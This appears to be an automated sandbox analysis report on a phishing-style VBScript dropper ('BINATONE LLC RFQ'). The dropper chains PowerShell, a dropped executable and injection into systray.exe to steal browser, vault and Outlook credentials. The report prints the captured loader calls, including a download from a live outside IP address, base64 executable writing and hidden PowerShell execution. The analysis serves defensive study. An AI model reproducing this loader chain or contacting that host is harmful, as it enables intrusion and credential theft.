              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DBA8409_2_04DBA840
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E7A9A69_2_04E7A9A6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB29A09_2_04DB29A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB99509_2_04DB9950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DCB9509_2_04DCB950
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DC69629_2_04DC6962
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E5DAC69_2_04E5DAC6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E4DAAC9_2_04E4DAAC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DAEA809_2_04DAEA80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DF5AA09_2_04DF5AA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E23A6C9_2_04E23A6C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E67A469_2_04E67A46
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6FA499_2_04E6FA49
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DEDBF99_2_04DEDBF9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E66BD79_2_04E66BD7
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DCFB809_2_04DCFB80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6FB769_2_04E6FB76
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6AB409_2_04E6AB40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC21609_2_02BC2160
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBB3309_2_02BBB330
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBB32A9_2_02BBB32A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBD1F09_2_02BBD1F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBB1E09_2_02BBB1E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBB1DF9_2_02BBB1DF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC3A009_2_02BC3A00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC58009_2_02BC5800
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC39FB9_2_02BC39FB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BDBEE09_2_02BDBEE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBCFD09_2_02BBCFD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BBCFCF9_2_02BBCFCF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBE4539_2_04BBE453
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBE7ED9_2_04BBE7ED
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBE3349_2_04BBE334
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBD8B89_2_04BBD8B8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 0145F290 appears 105 times
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 013CB970 appears 268 times
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 01427E54 appears 96 times
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 01415130 appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: String function: 0144EA12 appears 86 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04D9B970 appears 266 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DE5130 appears 36 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04E2F290 appears 105 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DF7E54 appears 88 times
              Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04E1EA12 appears 84 times
              Source: BINATONE LLC RFQ.Vbs.vbsInitial sample: Strings found which are bigger than 50
              Source: x.exe.2.drStatic PE information: No import functions for PE file found
              Source: RegAAsm.exe.4.drStatic PE information: No import functions for PE file found
              Source: Process Memory Space: powershell.exe PID: 1848, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: RegAAsm.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: RegAAsm.exe.4.drStatic PE information: Section .text
              Source: x.exe.2.drStatic PE information: Section: 1ZG(oi< ZLIB complexity 1.0007267441860466
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@12/9@5/5
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\blaqq[1].ps1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
              Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\JSDSDGSD.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: systray.exe, 00000009.00000002.3362471676.0000000003186000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3362471676.000000000317C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3362471676.000000000318C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BINATONE LLC RFQ.Vbs.vbsVirustotal: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe"
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" Jump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: Binary string: systray.pdb source: RegAAsm.exe, 00000005.00000003.2642661331.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: RegAAsm.exe, 00000005.00000003.2642661331.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RegAAsm.exe, 00000005.00000003.2577245110.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.000000000153E000.00000040.00001000.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000003.2575010609.0000000001045000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2679203136.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004F0E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2674514644.0000000004A14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RegAAsm.exe, RegAAsm.exe, 00000005.00000003.2577245110.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.000000000153E000.00000040.00001000.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000003.2575010609.0000000001045000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000009.00000003.2679203136.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004F0E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2674514644.0000000004A14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDIZeRcLxXsNvd.exe, 00000008.00000002.3362241286.00000000004AF000.00000002.00000001.01000000.0000000A.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\JSDSDGSD.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "http://87.120.120.56/crypt/blaqq.ps1", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.CreateTextFile("C:\Temp\JSDSDGSD.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGS", "0", "true")
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAE
              Source: x.exe.2.drStatic PE information: section name: 1ZG(oi<
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848AB00BD pushad ; iretd 2_2_00007FF848AB00C1
